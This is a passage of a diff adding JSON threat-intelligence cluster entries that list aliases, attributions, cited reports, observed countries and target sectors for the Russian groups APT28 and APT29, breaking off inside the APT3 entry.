"ebb27272-18c0-4cdb-89f1-6e8e66f6c0eb" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "8983bc4c-26f9-4d1b-a32d-5b198f90cc24", + "value": "Sofacy" + }, + { + "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)][[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)][[Securelist Sofacy Feb 2018](https://app.tidalcyber.com/references/3a043bba-2451-4765-946b-c1f3bf4aea36)][[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]", + "meta": { + "id": "ebcc547a-c3b7-4673-801f-4409511f6dd2" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "78894876-29d5-4feb-9afa-d7ab2955b81b", + "value": "Fancy Bear" + }, + { + "description": "[[Accenture SNAKEMACKEREL Nov 2018](https://app.tidalcyber.com/references/c38d021c-d84c-4aa7-b7a5-be47e18df1d8)]", + "meta": { + "id": "75a22116-0f97-4563-b49e-73ede9f679a0" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "7f58eb05-a22c-4df9-a8ad-6e3dfa97e511", + "value": "SNAKEMACKEREL" + }, + { + "description": "[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", + "meta": { + "id": "9e03a6df-6398-48c9-acae-cdadb68ed5ae" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "7f1b55a8-6645-4262-ba7f-8f3e9d372f10", + "value": "Swallowtail" + }, + { + "description": "[[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", + "meta": { + "id": "2d20b321-5edf-4bc7-915b-98eadcbf90a5" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "cf66714e-7dc7-44dc-b594-c7ee99610bc2", + "value": "Group 74" + }, + { + "description": "[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)] ", + "meta": { + "id": "faedc5a2-750e-4f7e-b219-caa2867c4cb6" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "c9b8f211-b713-4e51-8442-e494c4c56e8b", + "value": "Pawn Storm" + }, + { + "description": "[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)][[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Microsoft STRONTIUM Aug 2019](https://app.tidalcyber.com/references/7efd3c8d-5e69-4b6f-8edb-9186abdf0e1a)][[Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020](https://app.tidalcyber.com/references/0a65008c-acdd-40fa-af1a-3d9941af8eac)][[TrendMicro Pawn Storm Dec 2020](https://app.tidalcyber.com/references/3bc249cd-f29a-4a74-a179-a6860e43683f)][[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)]", + "meta": { + "id": "7b2468c3-ef9b-422b-8700-f2d9230115c9" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "f7c8de7a-3322-48b4-917c-e2ffd433890b", + "value": "STRONTIUM" + }, + { + "description": "[[U.S. Federal Bureau of Investigation 2 27 2024](/references/962fb031-dfd1-43a7-8202-3a2231b0472b)]", + "meta": { + "id": "9fe69ea1-4c35-4322-8029-b5ce381f8d94", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "5ef741d0-4089-4ca7-aed9-da91b36b75c9", + "value": "Forest Blizzard" + }, + { + "description": "[[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)][[Talos Seduploader Oct 2017](https://app.tidalcyber.com/references/2db77619-72df-461f-84bf-2d1c3499a5c0)]", + "meta": { + "id": "7003a53f-b1ba-44d0-8a04-bd1766e4865c" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "afa355ce-eb36-498d-b9e4-e0d6bce1573f", + "value": "Tsar Team" + }, + { + "description": "[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]", + "meta": { + "id": "b8651331-b87b-4ea6-934b-f170c3dc7303" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "f31dcaf0-e808-4073-9b57-88030e5842bb", + "value": "Threat Group-4127" + }, + { + "description": "[[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)]", + "meta": { + "id": "55adb620-5d68-4583-87db-f1d920d5d875" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "similar" + } + ], + "uuid": "8d33359e-a3fc-4423-a84a-82081e99fb82", + "value": "TG-4127" + }, + { + "description": "[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[[NSA/FBI Drovorub August 2020](https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)][[Cybersecurity Advisory GRU Brute Force Campaign July 2021](https://app.tidalcyber.com/references/e70f0742-5f3e-4701-a46b-4a58c0281537)] This group has been active since at least 2004.[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)][[Ars Technica GRU indictment Jul 2018](https://app.tidalcyber.com/references/a1192cb3-4536-4900-93c7-a127ca06c690)][[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)][[SecureWorks TG-4127](https://app.tidalcyber.com/references/5f401c82-4e16-43a1-b234-48918fe7df9f)][[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)][[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)][[Sofacy DealersChoice](https://app.tidalcyber.com/references/ec157d0c-4091-43f5-85f1-a271c4aac1fc)][[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)][[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)][[ESET Zebrocy May 2019](https://app.tidalcyber.com/references/f8b837fb-e46c-4153-8e86-dc4b909b393a)]\n\n[APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. [[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)] In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[[US District Court Indictment GRU Oct 2018](https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666). ", + "meta": { + "country": "RU", + "group_attack_id": "G0007", + "observed_countries": [ + "AF", + "AM", + "AU", + "AZ", + "BY", + "BE", + "BR", + "BG", + "CA", + "CL", + "CN", + "HR", + "CY", + "CZ", + "FR", + "GE", + "DE", + "HU", + "IN", + "IR", + "IQ", + "IT", + "JP", + "JO", + "KZ", + "KR", + "KG", + "LV", + "LT", + "MY", + "MX", + "MN", + "ME", + "NL", + "NO", + "PK", + "PL", + "RO", + "SK", + "ZA", + "ES", + "SE", + "CH", + "TJ", + "TH", + "TR", + "UG", + "UA", + "AE", + "GB", + "US", + "UZ" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "61cdbb28-cbfd-498b-9ab1-1f14337f9524", + "e551ae97-d1b4-484e-9267-89f33829ec2c", + "a98d7a43-f227-478e-81de-e7299639a355", + "916ea1e8-d117-45a4-8564-0597a02b06e4", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "15787198-6c8b-4f79-bf50-258d55072fee", + "f01290d9-7160-44cb-949f-ee4947d04b6f", + "b20e7912-6a8d-46e3-8e13-9a3fc4813852" + ], + "target_categories": [ + "Aerospace", + "Chemical", + "Defense", + "Education", + "Energy", + "Government", + "Hospitality Leisure", + "Manufacturing", + "Media", + "NGOs", + "Retail", + "Technology", + "Transportation", + "Utilities" + ] + }, + "related": [ + { + "dest-uuid": "5b4ee3ea-eee3-4c8e-8323-85ae32658754", + "type": "similar" + }, + { + "dest-uuid": "fc8d868d-e3df-486d-8efb-eed4d3554abe", + "type": "similar" + }, + { + "dest-uuid": "78e2b73c-4042-4c78-af27-c289450e9db1", + "type": "similar" + }, + { + "dest-uuid": "8983bc4c-26f9-4d1b-a32d-5b198f90cc24", + "type": "similar" + }, + { + "dest-uuid": "78894876-29d5-4feb-9afa-d7ab2955b81b", + "type": "similar" + }, + { + "dest-uuid": "7f58eb05-a22c-4df9-a8ad-6e3dfa97e511", + "type": "similar" + }, + { + "dest-uuid": "7f1b55a8-6645-4262-ba7f-8f3e9d372f10", + "type": "similar" + }, + { + "dest-uuid": "cf66714e-7dc7-44dc-b594-c7ee99610bc2", + "type": "similar" + }, + { + "dest-uuid": "c9b8f211-b713-4e51-8442-e494c4c56e8b", + "type": "similar" + }, + { + "dest-uuid": "f7c8de7a-3322-48b4-917c-e2ffd433890b", + "type": "similar" + }, + { + "dest-uuid": "5ef741d0-4089-4ca7-aed9-da91b36b75c9", + "type": "similar" + }, + { + "dest-uuid": "afa355ce-eb36-498d-b9e4-e0d6bce1573f", + "type": "similar" + }, + { + "dest-uuid": "f31dcaf0-e808-4073-9b57-88030e5842bb", + "type": "similar" + }, + { + "dest-uuid": "8d33359e-a3fc-4423-a84a-82081e99fb82", + "type": "similar" + } + ], + "uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "value": "APT28" + }, + { + "description": "[[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)][[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", + "meta": { + "id": "79985683-2fe1-408f-a947-cc7556185242" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "573520e2-7034-4610-b254-f58fd4330e9c", + "value": "StellarParticle" + }, + { + "description": "[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)][[MSTIC NOBELIUM May 2021](https://app.tidalcyber.com/references/047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d)][[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)][[MSRC Nobelium June 2021](https://app.tidalcyber.com/references/1588799f-a5d2-46bc-978d-f10ed7ceb15c)]", + "meta": { + "id": "e574f72a-e781-4170-9917-a417bd72e79e" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "a51f4654-cba5-4052-8d79-a8671339eb9e", + "value": "NOBELIUM" + }, + { + "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)][[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)][[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)][[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]", + "meta": { + "id": "44087a77-831c-4dc4-af9d-8a6aa4ef4fc8" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "0742ac72-9dc7-40ba-b568-1185187d93a8", + "value": "Cozy Bear" + }, + { + "description": "[[Secureworks IRON HEMLOCK Profile](https://app.tidalcyber.com/references/36191a48-4661-42ea-b194-2915c9b184f3)]", + "meta": { + "id": "3cb3858f-3e99-4ab0-ab04-6a2ff3e7d5cc" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "1e5b89db-5d7c-40f0-86a2-ab7affabd6c3", + "value": "IRON HEMLOCK" + }, + { + "description": "[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]", + "meta": { + "id": "72249657-2665-4406-8486-35016b132f8a" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "c0b8d1d5-4412-44b7-ba21-d2f0c96be941", + "value": "Dark Halo" + }, + { + "description": "[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)][[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)][[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)][[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)]", + "meta": { + "id": "530f67f9-ace5-4ac2-8b37-bd2a3865d690" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "b9af22de-f6b0-4b07-9182-1d43179e1d31", + "value": "The Dukes" + }, + { + "description": "[[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]", + "meta": { + "id": "d23fdc45-3325-519e-85e8-55353eec7d71" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "7a10ed9e-6744-5657-bc4f-dfea05a89105", + "value": "SolarStorm" + }, + { + "description": "[[PWC WellMess July 2020](https://app.tidalcyber.com/references/22794e37-3c55-444a-b659-e5a1a6bc2da0)][[PWC WellMess C2 August 2020](https://app.tidalcyber.com/references/3afca6f1-680a-46ae-8cea-10b6b870d5e7)]", + "meta": { + "id": "59d76b12-0ee2-5427-aee0-8f4fda583f25" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "e6294fb3-cd59-57de-a0a6-d19f4d2a1560", + "value": "Blue Kitsune" + }, + { + "description": "[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]", + "meta": { + "id": "3ccd8900-e251-540a-8206-4ebd1eec00c8" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "d381c0b3-36d6-5619-9111-e392345eb22d", + "value": "UNC3524" + }, + { + "description": "[[Microsoft Midnight Blizzard January 19 2024](/references/91b48ddd-9e3f-4d36-a262-3b52145b3db2)]", + "meta": { + "id": "05b6f671-7e22-4422-99b6-7438b6fc654b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "4f1c2576-e3bb-4cd0-8d9f-df4cde4db79d", + "value": "Midnight Blizzard" + }, + { + "description": "[[Secureworks IRON RITUAL Profile](https://app.tidalcyber.com/references/c1ff66d6-3ea3-4347-8a8b-447cd8b48dab)]", + "meta": { + "id": "3f6b0598-3a33-4726-aaed-a81e323f08b6" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "f26c70ba-7879-4083-bfd0-ec34bdb80416", + "value": "IRON RITUAL" + }, + { + "description": "[[SentinelOne NobleBaron June 2021](https://app.tidalcyber.com/references/98cf2bb0-f36c-45af-8d47-bf26aca3bb09)]", + "meta": { + "id": "82c24d84-98b7-4ea9-af12-e863506a0b62" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "7a8aa751-21a3-4fdc-b19b-2810ffb4f44f", + "value": "NobleBaron" + }, + { + "description": "[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)]", + "meta": { + "id": "5f3029c0-da2e-45ee-bda4-5afe70c098fa" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "b9ef525d-16a2-4896-8205-6da397b37245", + "value": "UNC2452" + }, + { + "description": "[[Microsoft Unidentified Dec 2018](https://app.tidalcyber.com/references/896c88f9-8765-4b60-b679-667b338757e3)]", + "meta": { + "id": "1c164198-c984-4371-b0ab-54f0e7d8c6fd" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "f60a21a2-2a87-4e54-99df-f78ab1a7fd26", + "value": "YTTRIUM" + }, + { + "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)]", + "meta": { + "id": "8d921cec-57e9-4a0e-95c8-0f220bf75771" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "similar" + } + ], + "uuid": "c71bf5f1-a297-4b10-8d66-3f61bd0b2a25", + "value": "CozyDuke" + }, + { + "description": "[APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).[[White House Imposing Costs RU Gov April 2021](https://app.tidalcyber.com/references/c2bf9e2f-cd0a-411d-84bc-61454a369c6b)][[UK Gov Malign RIS Activity April 2021](https://app.tidalcyber.com/references/7fe5a605-c33e-4d3d-b787-2d1f649bee53)] They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) reportedly compromised the Democratic National Committee starting in the summer of 2015.[[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)][[GRIZZLY STEPPE JAR](https://app.tidalcyber.com/references/4b26d274-497f-49bc-a2a5-b93856a49893)][[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[UK Gov UK Exposes Russia SolarWinds April 2021](https://app.tidalcyber.com/references/ffbd83d7-9d4f-42b9-adc0-eb144045aef2)]\n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) to the SVR; public statements included citations to [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447), Cozy Bear, and The Dukes.[[NSA Joint Advisory SVR SolarWinds April 2021](https://app.tidalcyber.com/references/43d9c469-1d54-454b-ba67-74e7f1de9c10)][[UK NSCS Russia SolarWinds April 2021](https://app.tidalcyber.com/references/f49e6780-8caa-4c3c-8d68-47a2cc4319a1)] Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.[[FireEye SUNBURST Backdoor December 2020](https://app.tidalcyber.com/references/d006ed03-a8af-4887-9356-3481d81d43e4)][[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)][[CrowdStrike SUNSPOT Implant January 2021](https://app.tidalcyber.com/references/3a7b71cf-961a-4f63-84a8-31b43b18fb95)][[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)][[Cybersecurity Advisory SVR TTP May 2021](https://app.tidalcyber.com/references/e18c1b56-f29d-4ea9-a425-a6af8ac6a347)][[Unit 42 SolarStorm December 2020](https://app.tidalcyber.com/references/ecbb602a-2427-5eba-8c2b-25d90c95f166)]", + "meta": { + "country": "RU", + "group_attack_id": "G0016", + "observed_countries": [ + "AU", + "AT", + "AZ", + "BY", + "BE", + "BR", + "BG", + "CA", + "CN", + "CY", + "CZ", + "FR", + "GE", + "DE", + "HU", + "IN", + "IE", + "IL", + "JP", + "KZ", + "KR", + "KG", + "LV", + "LB", + "LT", + "LU", + "MX", + "ME", + "NL", + "NZ", + "NO", + "PL", + "PT", + "RO", + "RU", + "SK", + "SI", + "ES", + "TR", + "UG", + "UA", + "GB", + "US", + "UZ" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "08809fa0-61b6-4394-b103-1c4d19a5be16", + "4a457eb3-e404-47e5-b349-8b1f743dc657", + "15f2277a-a17e-4d85-8acd-480bf84f16b4", + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", + "33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a", + "c9c73000-30a5-4a16-8c8b-79169f9c24aa" + ], + "target_categories": [ + "Aerospace", + "Commercial", + "Defense", + "Education", + "Energy", + "Financial Services", + "Government", + "Healthcare", + "Insurance", + "Legal", + "Manufacturing", + "Media", + "NGOs", + "Non Profit", + "Pharmaceuticals", + "Technology", + "Telecommunications", + "Think Tanks", + "Video Games" + ] + }, + "related": [ + { + "dest-uuid": "b2056ff0-00b9-482e-b11c-c771daa5f28a", + "type": "similar" + }, + { + "dest-uuid": "573520e2-7034-4610-b254-f58fd4330e9c", + "type": "similar" + }, + { + "dest-uuid": "a51f4654-cba5-4052-8d79-a8671339eb9e", + "type": "similar" + }, + { + "dest-uuid": "0742ac72-9dc7-40ba-b568-1185187d93a8", + "type": "similar" + }, + { + "dest-uuid": "1e5b89db-5d7c-40f0-86a2-ab7affabd6c3", + "type": "similar" + }, + { + "dest-uuid": "c0b8d1d5-4412-44b7-ba21-d2f0c96be941", + "type": "similar" + }, + { + "dest-uuid": "b9af22de-f6b0-4b07-9182-1d43179e1d31", + "type": "similar" + }, + { + "dest-uuid": "7a10ed9e-6744-5657-bc4f-dfea05a89105", + "type": "similar" + }, + { + "dest-uuid": "e6294fb3-cd59-57de-a0a6-d19f4d2a1560", + "type": "similar" + }, + { + "dest-uuid": "d381c0b3-36d6-5619-9111-e392345eb22d", + "type": "similar" + }, + { + "dest-uuid": "4f1c2576-e3bb-4cd0-8d9f-df4cde4db79d", + "type": "similar" + }, + { + "dest-uuid": "f26c70ba-7879-4083-bfd0-ec34bdb80416", + "type": "similar" + }, + { + "dest-uuid": "7a8aa751-21a3-4fdc-b19b-2810ffb4f44f", + "type": "similar" + }, + { + "dest-uuid": "b9ef525d-16a2-4896-8205-6da397b37245", + "type": "similar" + }, + { + "dest-uuid": "f60a21a2-2a87-4e54-99df-f78ab1a7fd26", + "type": "similar" + }, + { + "dest-uuid": "c71bf5f1-a297-4b10-8d66-3f61bd0b2a25", + "type": "similar" + } + ], + "uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "value": "APT29" + }, + { + "description": "[[PWC Pirpi Scanbox](https://app.tidalcyber.com/references/4904261a-a3a9-4c3e-b6a7-079890026ee2)] [[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "id": "be611484-9a2e-4588-b8fa-c0508d5b6664" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "similar" + } + ], + "uuid": "d447bfdc-0a5c-4651-9070-2b3b87ac2128", + "value": "Gothic Panda" + }, + { + "description": "[[PWC Pirpi Scanbox](https://app.tidalcyber.com/references/4904261a-a3a9-4c3e-b6a7-079890026ee2)]", + "meta": { + "id": "6d48e081-6e08-46c1-9540-4040930dcb84" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "similar" + } + ], + "uuid": "feff078c-cd96-4e56-90a7-4310ae8e48cb", + "value": "Pirpi" + }, + { + "description": "[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)] [[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "id": "12d12339-8efc-4730-8987-71c5a15de637" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "similar" + } + ], + "uuid": "bceffa47-b63a-4ebf-bded-33cb633c5ea7", + "value": "UPS Team" + }, + { + "description": "[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "id": "bd9c167a-8dc3-4476-a119-d919c905cd26" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "similar" + } + ], + "uuid": "4149bb91-e34b-4d22-80f1-e8adfab0d17f", + "value": "Buckeye" + }, + { + "description": "[[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "id": "04676dcd-f1cb-4333-8be5-430590252412" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "similar" + } + ], + "uuid": "9eac64b2-f6ac-4a34-98c9-b159337fbea8", + "value": "Threat Group-0110" + }, + { + "description": "[[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] [[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]", + "meta": { + "id": "daf15744-3090-430a-86b5-573037ff5654" + }, + "related": [ + { + "dest-uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "type": "similar" + } + ], + "uuid": "a62a6f94-d301-4cf8-b67e-662fd7f91d73", + "value": "TG-0110" + }, + { + "description": "[APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9) is a China-based threat group that researchers have attributed to China's Ministry of State Security.[[FireEye Clandestine 